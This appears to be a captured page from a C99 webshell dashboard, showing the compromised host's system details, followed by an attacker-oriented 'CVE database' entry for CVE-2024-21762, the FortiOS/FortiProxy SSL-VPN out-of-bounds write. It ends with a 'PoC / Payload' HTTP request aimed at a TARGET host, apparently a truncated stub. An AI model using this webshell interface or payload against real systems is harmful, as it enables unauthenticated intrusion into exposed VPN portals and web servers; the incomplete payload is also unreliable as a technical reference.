C99SHELL DASHBOARDc99shell.tail7973d7.ts.net WebshellDBRoot 2026-08-03 08:14:51

!C99SHELL 2.0 [PHP 7 Update] [25.02.2019] !

Software: Apache/2.4.68 (Debian). PHP/8.2.33  

uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1
(2026-06-18) x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data)  

Safe-mode: OFF (not secure)

/var/www/html/   drwxrwxrwx
Free 115.58 GB of 452.4 GB (25.55%)



CVE DATABASEarchive & lookup of vulnerabilities
CVE CVE-2024-21762vulnerability detail
[← Back to CVE DB]
IdentifierCVE-2024-21762
SeverityCRITICAL
CVSS v39.8 / 10
NameFortiOS/FortiProxy SSL-VPN RCE
AffectedFortiOS <7.4.4, <7.2.9, FortiProxy <7.2.8

Description

Out-of-bounds write in the sslvpnd daemon of FortiOS/FortiProxy SSL-VPN. A crafted HTTP request triggers a heap overflow, giving unauthenticated remote code execution. Exploited in the wild against exposed SSL-VPN portals.

PoC / Payload — CVE-2024-21762
POST /remote/error HTTP/1.1\nHost: TARGET\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 16\n\nlang=en;\xff..\xff..